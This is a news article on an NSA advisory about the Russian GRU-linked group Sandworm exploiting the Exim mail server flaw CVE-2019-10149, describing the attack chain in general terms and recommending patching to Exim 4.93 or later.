Hackers linked with Russian military intelligence are exploiting Exim mail transfer agent bug to target US organisations, NSA warns

The particular group is referred to as "Sandworm" in cyber security community

The US National Security Agency (NSA) has issued a cyber security advisory warning American organisations of a Russian hacking campaign exploiting a bug in commonly used email software to target private firms and organisations.

According to the NSA, the hacking group behind these attacks is associated with GRU, a unit within Russia's Main Intelligence Directorate. This group is referred to as "Sandworm" in cyber security community and is linked with power-grid attacks in Ukraine.

The NSA says these hackers have been leveraging a serious security flaw, indexed as CVE-2019-10149, in Exim mail transfer agent (MTA) since at least August 2019.

Exim is commonly found on Unix-based operating systems. It comes pre-installed on some Linux distributions such as Debia.

While a patch for CVE-2019-10149 has already been released, many users have not yet updated their systems to patch the security gap in their systems.

A quick Shodan search reveals that vulnerable Exim versions are currently running on about 2,481,000 Internet-exposed servers, with over 2,467,000 servers running the patched Exim 4.93 version.

To exploit the bug, hackers just need to send a specially crafted email, which enables them to run arbitrary commands with root privileges on vulnerable mail servers.

After CVE-2019-10149 is successfully exploited, the victim's machine subsequently downloads a shell script from a Sandworm-controlled domain. The script then attempts to disable network security settings, add privileged users, change SSH configurations, and download more scripts to enable follow-on exploitation.

"Being able to gain root access to a bridge point into a network gives you so much ability and capability to read email, to navigate across and manoeuvre through the network," the NSA explains.

To mitigate the risk, the NSA recommends that system admins should patch their Exim servers by installing version 4.93 or newer. They should also check software versions regularly and update them as new versions become available.

The NSA has also released Indicators of Compromise (IoC) and instructions on how admins can detect exploit attempts and unauthorised changes in their systems.

Last year, Google's Threat Analysis Group (TAG) disclosed that it had sent more than 12,000 warnings in just three months to alert users about email attacks traced to Sandworm group.

TAG researchers said they had also noticed Sandworm targeting legitimate app developers in Ukraine through spear phishing emails. In one such case, the attackers were able to compromise a developer with a large number of published apps on Play Store.